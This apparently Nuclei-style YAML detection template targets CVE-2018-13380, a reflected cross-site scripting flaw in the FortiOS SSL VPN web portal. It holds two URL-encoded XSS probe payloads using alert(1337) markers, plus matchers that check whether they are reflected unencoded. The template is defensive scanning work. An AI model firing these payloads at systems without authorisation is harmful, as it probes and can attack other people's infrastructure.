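# Detection template for CVE-2018-13380: reflected XSS in the FortiOS SSL VPN
# web portal via the error/message handling parameters.
id: CVE-2018-13380

info:
  name: Fortinet FortiOS Cross-Site Scripting
  author: shelld3v
  severity: medium
  description: >-
    A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to
    6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL
    VPN web portal allows attacker to execute unauthorized malicious script
    code via the error or message handling parameters.
  type: XSS
  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
  tags: cve,cve2018,fortios,xss

requests:
  - method: GET
    # Two probes, one per affected handler. Each carries its own marker, so
    # the body matcher below has to list both markers.
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    # All three matchers must hold for a response to be reported.
    matchers-condition: and
    matchers:
      # The marker must come back unencoded in the body. Previously only the
      # <svg> marker was listed, so the /remote/error probe, which reflects a
      # <script> marker, could never match (a silent false negative).
      - type: word
        words:
          - "<svg/onload=alert(1337)>"
          - "<script>alert(1337)</script>"
        condition: or
        part: body

      # Skip responses served as JSON, presumably because reflected markup in
      # a JSON body is not rendered as HTML by the browser.
      - type: word
        words:
          - "application/json"
        part: header
        negative: true

      # NOTE(review): a 200 with the marker reflected shows unencoded
      # reflection only; confirm the FortiOS version against the affected
      # ranges in the description before treating a hit as confirmed.
      - type: status
        status:
          - 200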